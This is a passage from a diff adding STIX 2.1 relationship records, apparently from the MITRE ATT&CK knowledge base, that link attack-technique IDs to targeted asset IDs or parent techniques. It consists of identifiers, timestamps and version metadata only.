these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aba9d812-3839-42c8-9759-be934c1e54a4", + "created": "2020-01-13T15:52:59.231Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--abcb34df-28e1-46c5-8e65-e35aeb715e4d", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac06e75d-0ccf-43cf-a092-a1d1ead898eb", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac1d5536-6cb0-4d77-8349-a246fa361fce", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac49a288-942b-4df7-9fc1-9fca204085bc", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac53cb36-9471-4ea0-8316-42d97f84956f", + "created": "2020-01-30T14:40:20.626Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", + "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac63609d-d22d-400e-a86d-0d221ebe4335", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac63d227-ff8a-43b8-81ef-ec4c046c4291", + "created": "2023-10-02T20:20:19.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:20:19.426Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac794e61-6ac1-4353-98e7-8348f3a1ebc5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac800800-4757-40de-90ab-deb80f5465a4", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac933d76-8207-4bf7-add2-92b60cf3044b", + "created": "2023-09-28T20:04:54.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:04:54.213Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ac9a76b9-8329-4bd4-8ca5-47f422dab2b8", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--acad4585-0db8-4cc4-a6cb-af7f4fac630e", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--acb33bdd-40e4-4fb2-a269-243a75309d62", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ace4bdb8-1b8a-4f15-8813-e514a351bf90", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--acecb18a-21e8-4124-b327-c4b6225aeb8e", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--acee8707-582a-4c0d-85e6-a94ffdc7c3d8", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--acf94f87-c40d-46e5-917e-9bdf8ef0e806", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--acfcf448-b7ab-471b-b709-24be612de455", + "created": "2024-06-27T09:05:00.728Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:05:00.728Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ad002323-3944-4690-b9ae-4c183d2897a9", + "created": "2024-06-26T15:34:37.667Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:34:37.667Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ad20fc6c-61eb-4d77-85e1-6d40717ae528", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ad6d6d82-5344-42c8-a1e3-ade6fd7ce7a6", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ad87c28e-98e1-4e4b-880f-fb544081eaf6", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ad87ebba-c4fc-458a-8ccd-c1cbd16ae14d", + "created": "2022-09-28T13:29:53.437Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-28T13:29:53.437Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ad982a6b-ceb9-4434-ad25-8da461aee242", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ada8dcbc-00c6-43d1-b3ef-66280880423e", + "created": "2024-06-26T15:38:45.826Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:38:45.826Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--adaa71c7-289f-4686-9753-05c71810bc79", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--adb205b0-120c-42b7-b0b9-67afd549f84e", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--adb41ca8-7d2a-4025-b673-db44c9e1f16b", + "created": "2023-09-28T21:12:39.257Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:12:39.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--adc8024e-86d0-4eb3-b72f-b8d3185fa538", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--adcc2e31-47e9-44c3-bcc3-b66d86bacf05", + "created": "2024-06-27T09:35:18.028Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:35:18.028Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--add18a9b-9556-4f62-997a-f29ae21d0096", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--add21e1b-9927-4d28-b16f-2dd2aba3ff05", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aded09ba-7233-40ad-9efc-5bb7c71d7a3c", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--adfeb8d8-1ce1-4abe-9861-21e2b26e8caa", + "created": "2020-02-04T12:58:40.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ae26e1a0-ab6a-4b5d-b2aa-640fa0379080", + "created": "2024-06-26T15:38:07.233Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:38:07.233Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ae4e86c6-4bbb-4aba-80fc-c20a8f3d63dc", + "created": "2023-09-28T19:50:14.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:50:14.201Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ae637028-eaae-4f1c-bdeb-b942be8c2a23", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", 